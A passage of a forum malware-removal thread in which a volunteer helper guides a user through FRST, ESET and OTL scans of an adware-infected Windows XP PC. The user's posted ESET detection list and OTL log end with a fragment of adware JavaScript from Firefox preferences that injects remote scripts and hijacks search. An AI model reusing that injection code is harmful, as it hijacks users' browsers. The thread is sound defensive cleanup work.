Error: (08/21/2014 09:22:42 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Workstation service which failed to start because of the following error:
%%1066


Microsoft Office Sessions:
=========================
Error: (11/15/2013 08:21:40 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 240120 seconds with 2700 seconds of active time.  This session ended with a crash.


==================== Memory info ===========================

Processor:  Intel® Pentium® D CPU 3.00GHz
Percentage of memory in use: 68%
Total physical RAM: 1014.42 MB
Available physical RAM: 315.61 MB
Total Pagefile: 2442.12 MB
Available Pagefile: 1601.73 MB
Total Virtual: 2047.88 MB
Available Virtual: 1932.08 MB

==================== Drives ================================

Drive c: (ACER) (Fixed) (Total:71.84 GB) (Free:33.75 GB) NTFS ==>[Drive with boot components (Windows XP)]
Drive d: (ACERDATA) (Fixed) (Total:72.31 GB) (Free:13.53 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 153.4 GB) (Disk ID: 6025DFE9)
Partition 1: (Not Active) - (Size=4.9 GB) - (Type=12)
Partition 2: (Active) - (Size=71.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=72.3 GB) - (Type=0C)

==================== End Of Log ============================

-RG


Edited by Starbuck, 22 August 2014 - 09:23 AM.


#6 Starbuck

    'r Brudiwr

  • Malware Response Team
  • 4,149 posts
  • Gender:Male
  • Location:Midlands, UK

Posted 22 August 2014 - 10:25 AM

Hi rockgremlin

That's a nice collection of Adware you have there... let's remove it.

Please download the attached fixlist.txt file (bottom of this post) and save it to C:\Documents and Settings\Jay\My Documents\Downloads.
NOTE:
It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system.


Re-run FRST/FRST64 (whichever is installed) and press the Fix button just once and wait.


The tool will make a log in the Download folder (Fixlog.txt). Please post this in your next reply.

Also let me know how the system is running after the fix.

Thanks



#7 rockgremlin


Posted 23 August 2014 - 10:40 PM

'r Brudiwr

First of all, I'm in love with your avatar. Secondly, I've been surfing around different locales on the internet as well as a few local drives and all seems very normal. No more annoying pop-ups at every turn, and overall things seem to run a little faster. If anything else crops up, I'll ring in again. But for now it appears the malware may be deceased...unless you see anything else that needs adjusting.

Many, many thanks.

Attached is my log:



#8 Starbuck


Posted 24 August 2014 - 02:16 AM

Hi rockgremlin

"I'm in love with your avatar."

Thank you :)

"unless you see anything else that needs adjusting."

I'd like to double check everything and then have a look at the system using a different tool.
You can't be too careful.


Step 1
I'd like you to do an ESET OnlineScan

You may find it beneficial to close your resident AV program before running the scan.
  • Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  • Click the esetOnline.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetSmartInstall.png to download the ESET Smart Installer.
      Save it to your desktop.
    • Double click on the esetSmartInstallDesktopIcon.png icon on your desktop.
  • Check esetAcceptTerms.png
  • Click the esetStart.png button.
  • Accept any security warnings from your browser.
  • Check esetScanArchives.png
  • Make sure that the option Remove found threats is ticked, and the option Scan unwanted applications is checked
  • Click the Start button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, push esetListThreats.png
  • Click esetExport.png, and save the file to your desktop using a unique name, such as ESETScan.
    Include the contents of this report in your next reply.
  • Click the esetBack.png button.
  • Click esetFinish.png
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt


Note:
It's been found that on some systems ESET's Online Scan fails during the database download (around 20%).
To prevent this happening:
When the Computer scan settings display shows, click the Advanced option, then place a check next to the following (if it is not already checked):

Enable Anti-Stealth technology





Step 2
  • Download OTL to your desktop.
    Right click on the link and select 'Save Link/Target As'.

    If you have problems, try this download link:
    OTL
  • Double click on the icon to run it. Vista/Windows 7 users right-click and select Run As Administrator.
  • Make sure all other windows are closed and let it run uninterrupted.
  • When the window appears, underneath Output at the top change it to Minimal Output.
  • Check the boxes beside LOP Check and Purity Check

Now copy the lines in bold below.

netsvcs
msconfig
%SYSTEMDRIVE%\*.*
%systemroot%\system32\Spool\prtprocs\w32x86\*.dll
%systemroot%\*. /mp /s
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\Tasks\*.job /lockedfiles
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\system32\*.exe /lockedfiles
%systemroot%\System32\config\*.sav
%PROGRAMFILES%\*
%USERPROFILE%\..|smtmp;true;true;true /FP
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
hklm\software\clients\startmenuinternet|command /rs
hklm\software\clients\startmenuinternet|command /64 /rs
CREATERESTOREPOINT
  • Right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste.
  • Click the Run Scan button.
  • Do not change any settings unless otherwise told to do so. The scan won't take long.
  • When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
  • Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them with your next reply.
In your next reply, please submit:
Eset scan report
Both reports from Otl.


Thanks.



#9 rockgremlin


Posted 29 August 2014 - 11:51 PM

OKAY, ESET Scan:

C:\AdwCleaner\Quarantine\C\Documents and Settings\Jay\LOCALS~1\Temp\CT3286042\CT3286042.xpi.vir    a variant of Win32/Conduit.SearchProtect.N potentially unwanted application    deleted - quarantined
C:\Documents and Settings\Jay\Local Settings\Application Data\CRE\gpaiibklhaneknloaoccoidbaffjjlnb.crx    a variant of Win32/Toolbar.Conduit.AH potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy\Recovery\WinDownloadergen17.zip    Win32/Bagle.gen.zip worm    cleaned by deleting - quarantined
C:\FRST\Quarantine\C\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy\Recovery\WinDownloadergen18.zip    Win32/Bagle.gen.zip worm    cleaned by deleting - quarantined
C:\FRST\Quarantine\C\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy\Recovery\WinDownloadergen19.zip    Win32/Bagle.gen.zip worm    cleaned by deleting - quarantined
C:\FRST\Quarantine\C\Documents and Settings\Jay\Application Data\VOPackage\VOPackage.exe    Win32/VOPackage.U potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Documents and Settings\Jay\Local Settings\Application Data\Linkey\Linkey\Helper.dll    a variant of Win32/Toolbar.SearchSuite.P potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\Helper.dll    a variant of Win32/Toolbar.SearchSuite.C potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\Internet Explorer Settings.exe    a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmf.dll    a variant of Win32/Toolbar.SearchSuite.C potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmfbho.dll    a variant of Win32/Toolbar.SearchSuite.C potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmfldr.dll    a variant of Win32/Toolbar.SearchSuite.S potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmfldr_u.dll    a variant of Win32/Toolbar.SearchSuite.S potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmfmgrc2.cfg    a variant of Win32/AdWare.Bandoo.AG application    cleaned by deleting - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\SmdmFService.exe    probably a variant of Win32/Toolbar.SearchSuite.D potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmfu.exe    a variant of Win32/Toolbar.SearchSuite.O potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\sysapcrt.dll    a variant of Win32/Toolbar.SearchSuite.C potentially unwanted application    deleted - quarantined
C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394\xkymsyyrfh.dll    a variant of Win32/AdWare.CouponAmazing.B application    cleaned by deleting - quarantined
C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394\znjxnhqeua.exe    a variant of Win32/AdWare.Adpeak.J application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP1\A0001070.dll    a variant of Win32/SProtector.D potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP1\A0001071.dll    a variant of Win32/SProtector.D potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP1\A0001072.exe    a variant of Win32/AdWare.Adpeak.F application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007501.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007502.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007503.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007504.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007505.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007506.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007507.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007508.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007509.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007510.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007511.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007512.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007513.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007514.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007515.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007516.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007517.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007518.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007519.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007520.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007521.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007522.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007523.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007524.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007525.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007526.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007527.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007528.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007529.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007530.dll    Win64/Toolbar.Conduit.B potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007531.dll    Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007532.dll    a variant of Win32/Toolbar.Conduit.P potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007533.dll    a variant of Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP2\A0001137.exe    a variant of Win32/AdWare.EoRezo.AU application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP2\A0001139.exe    a variant of Win32/Adware.EoRezo.AJ application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP2\A0001144.exe    Win32/AdWare.EoRezo.AW application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP6\A0006628.dll    a variant of Win32/AdWare.MultiPlug.AY application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP6\A0006629.exe    a variant of Win32/AdWare.MultiPlug.AG application    cleaned by deleting - quarantined

 

 

OTL Scan:

OTL logfile created on: 8/29/2014 9:09:26 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Documents and Settings\Jay\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
1014.42 Mb Total Physical Memory | 264.36 Mb Available Physical Memory | 26.06% Memory free
2.38 Gb Paging File | 1.77 Gb Available in Paging File | 74.30% Paging File free
Paging file location(s): C:\pagefile.sys 1524 3048 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 71.84 Gb Total Space | 31.10 Gb Free Space | 43.29% Space Free | Partition Type: NTFS
Drive D: | 72.31 Gb Total Space | 13.53 Gb Free Space | 18.71% Space Free | Partition Type: FAT32
 
Computer Name: MOLES | User Name: Jay | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - C:\Documents and Settings\Jay\Desktop\OTL.scr (OldTimer Tools)
PRC - C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
PRC - C:\Program Files\Java\jre7\bin\jqs.exe (Oracle Corporation)
PRC - C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)
PRC - C:\Program Files\AVAST Software\Avast\AvastSvc.exe (AVAST Software)
PRC - C:\Program Files\AVAST Software\Avast\afwServ.exe (AVAST Software)
PRC - C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe (Spotify Ltd)
PRC - C:\Program Files\Microsoft\BingBar\7.1.361.0\SeaPort.EXE (Microsoft Corporation.)
PRC - C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe (Intuit Inc.)
PRC - C:\Program Files\SUPERAntiSpyware\SASCore.exe (SUPERAntiSpyware.com)
PRC - C:\Program Files\WinZip\WZQKPICK.EXE (WinZip Computing, S.L.)
PRC - C:\WINDOWS\explorer.exe (Microsoft Corporation)
PRC - C:\Acer\Empowering Technology\eRecovery\eRAgent.exe (Acer Inc.)
PRC - C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe (HiTRUST)
PRC - C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe (X-Micro Technology Corp.)
 
 
========== Modules (No Company Name) ==========
 
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceProce#\2e3fdae8546832614633495638bef8d0\System.ServiceProcess.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Runtime.Remo#\8556fa9ad747e43a85e107dbeb42659e\System.Runtime.Remoting.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.EnterpriseSe#\6a5f031a28c774f1163af0715c3a6097\System.EnterpriseServices.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Transactions\fc7255cccb69c45a808b3d7e6abf55c5\System.Transactions.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Data\b5f67ff59d386021c43b1ee400c00feb\System.Data.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\2781e84862746a34f026d0ee179eed2b\System.Windows.Forms.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\243ff1822abc8282cb8fee37538170b4\System.Drawing.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Core\a4b5a1a06d2d7f77258943c8c228a5e0\System.Core.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Xml\850fa7110c7423c324762c1ad3130219\System.Xml.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Configuration\991c4e11f571a4074b9c4a5841222338\System.Configuration.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\4c906eb82e6f56aea01b2a7291fab7ea\System.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\4e62d1d9b7dd2c2d14915abb73c22d50\mscorlib.ni.dll ()
MOD - C:\Program Files\Mozilla Firefox\mozjs.dll ()
MOD - C:\Program Files\AVAST Software\Avast\defs\13082500\algo.dll ()
MOD - C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll ()
MOD - C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll ()
MOD - C:\Program Files\WinRAR\RarExt.dll ()
MOD - C:\Program Files\FileZilla FTP Client\fzshellext.dll ()
MOD - C:\WINDOWS\system32\CmdLineExt03.dll ()
MOD - C:\Acer\Empowering Technology\eRecovery\it41.dll ()
MOD - C:\Acer\Empowering Technology\eRecovery\imagefile.dll ()
MOD - C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.dll ()
MOD - C:\Program Files\Acer WLAN 11g USB Dongle\dot1x_dll.dll ()
MOD - C:\Program Files\Acer WLAN 11g USB Dongle\ssleay32.dll ()
MOD - C:\Program Files\Acer WLAN 11g USB Dongle\libeay32.dll ()
 
 
========== Services (SafeList) ==========
 
SRV - (SmdmFService) -- C:\Program Files\Settings Manager\smdmf\SmdmFService.exe File not found
SRV - (Amazon Download Agent) -- C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderService.exe File not found
SRV - (MozillaMaintenance) -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe (Mozilla Foundation)
SRV - (AdobeFlashPlayerUpdateSvc) -- C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe (Adobe Systems Incorporated)
SRV - (JavaQuickStarterService) -- C:\Program Files\Java\jre7\bin\jqs.exe (Oracle Corporation)
SRV - (avast! Antivirus) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe (AVAST Software)
SRV - (avast! Firewall) -- C:\Program Files\AVAST Software\Avast\afwServ.exe (AVAST Software)
SRV - (BBUpdate) -- C:\Program Files\Microsoft\BingBar\7.1.361.0\SeaPort.EXE (Microsoft Corporation.)
SRV - (BBSvc) -- C:\Program Files\Microsoft\BingBar\7.1.361.0\BBSvc.EXE (Microsoft Corporation.)
SRV - (IntuitUpdateServiceV4) -- C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe (Intuit Inc.)
SRV - (!SASCORE) -- C:\Program Files\SUPERAntiSpyware\SASCore.exe (SUPERAntiSpyware.com)
SRV - (SupportSoft RemoteAssist) -- C:\Program Files\Common Files\supportsoft\bin\ssrc.exe (SupportSoft, Inc.)
 
 
========== Driver Services (SafeList) ==========
 
DRV - (WDICA) --  File not found
DRV - (PDRFRAME) --  File not found
DRV - (PDRELI) --  File not found
DRV - (PDFRAME) --  File not found
DRV - (PDCOMP) --  File not found
DRV - (PCIDump) --  File not found
DRV - (lbrtfdc) --  File not found
DRV - (i2omgmt) --  File not found
DRV - (F06DEFF2-5B9C-490D-910F-35D3A9119622) -- C:\Program Files\Settings Manager\smdmf\smdmfmgrc2.cfg File not found
DRV - (Changer) --  File not found
DRV - (netfilter) -- C:\WINDOWS\system32\drivers\netfilter.sys (NetFilterSDK.com)
DRV - (aswSnx) -- C:\WINDOWS\System32\drivers\aswSnx.sys (AVAST Software)
DRV - (aswSP) -- C:\WINDOWS\System32\drivers\aswSP.sys (AVAST Software)
DRV - (aswVmm) -- C:\WINDOWS\System32\drivers\aswVmm.sys ()
DRV - (aswTdi) -- C:\WINDOWS\System32\drivers\aswTdi.sys (AVAST Software)
DRV - (aswRvrt) -- C:\WINDOWS\System32\drivers\aswRvrt.sys ()
DRV - (aswNdis2) -- C:\WINDOWS\System32\drivers\aswNdis2.sys (AVAST Software)
DRV - (aswMonFlt) -- C:\WINDOWS\system32\drivers\aswMonFlt.sys (AVAST Software)
DRV - (aswRdr) -- C:\WINDOWS\System32\drivers\aswRdr.sys (AVAST Software)
DRV - (aswKbd) -- C:\WINDOWS\System32\drivers\aswKbd.sys (AVAST Software)
DRV - (aswFW) -- C:\WINDOWS\System32\drivers\aswFW.sys (AVAST Software)
DRV - (aswFsBlk) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys (AVAST Software)
DRV - (eeCtrl) -- C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys (Symantec Corporation)
DRV - (SASDIFSV) -- C:\Program Files\SUPERAntiSpyware\sasdifsv.sys (SUPERAdBlocker.com and SUPERAntiSpyware.com)
DRV - (SASKUTIL) -- C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS (SUPERAdBlocker.com and SUPERAntiSpyware.com)
DRV - (aswNdis) -- C:\WINDOWS\system32\drivers\aswNdis.sys (ALWIL Software)
DRV - (symlcbrd) -- C:\WINDOWS\system32\drivers\symlcbrd.sys (Symantec Corporation)
DRV - (yukonwxp) -- C:\WINDOWS\system32\drivers\yk51x86.sys (Marvell)
DRV - (IntcAzAudAddService) -- C:\WINDOWS\system32\drivers\RtkHDAud.Sys (Realtek Semiconductor Corp.)
DRV - (ZD1211BU(ZyDAS) -- C:\WINDOWS\system32\drivers\ZD1211BU.sys (ZyDAS Technology Corporation)
DRV - (ZD1211U(ZyDAS) -- C:\WINDOWS\system32\drivers\ZD1211U.sys (ZyDAS Technology Corporation)
DRV - (ZDPSp50) -- C:\WINDOWS\system32\drivers\ZDPSp50.sys (Printing Communications Assoc., Inc. (PCAUSA))
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultName = Search
IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7&rlz=1I7_____en
IE - HKCU\..\SearchScopes\{7E60BFCC-2A08-4B56-A6CC-DE65F6675C3F}: "URL" = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local;<local>
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyServer" = http=127.0.0.1
 
========== FireFox ==========
 
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://www.google.com/"
FF - prefs.js..extensions.6Ge.scode: [minified JavaScript value removed]
e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}}); ;if(Math.ceil(Math.random()*20)==1){(function(){var a = \"microsoft msn youtube.com ninemsn yahoo maktoob rivals amazon jeuxvideo xbox flickr outlook microsoftstore alltheweb intonow overture tumblr live facebook embedr altavista ashleyfurniturehomestore reddit tripadvisor rightmedia craigslist sprint mozilla att omg.com apple americanexpress\".split(\" \");for(var i=0;i<a.length;i++) if(window.self.location.hostname.indexOf(a[i])>-1){return};try{if(typeof(localStorage)!='undefined' && (window.self.location.hostname.indexOf('adnxs.com')>-1 || window.self.location.hostname.indexOf('doubleclick')>-1 || window.self.location.hostname.indexOf('cloudfront')>-1)){localStorage.setItem(\"xhxg4sk42hsba\",\"9\")}}catch(e){};var 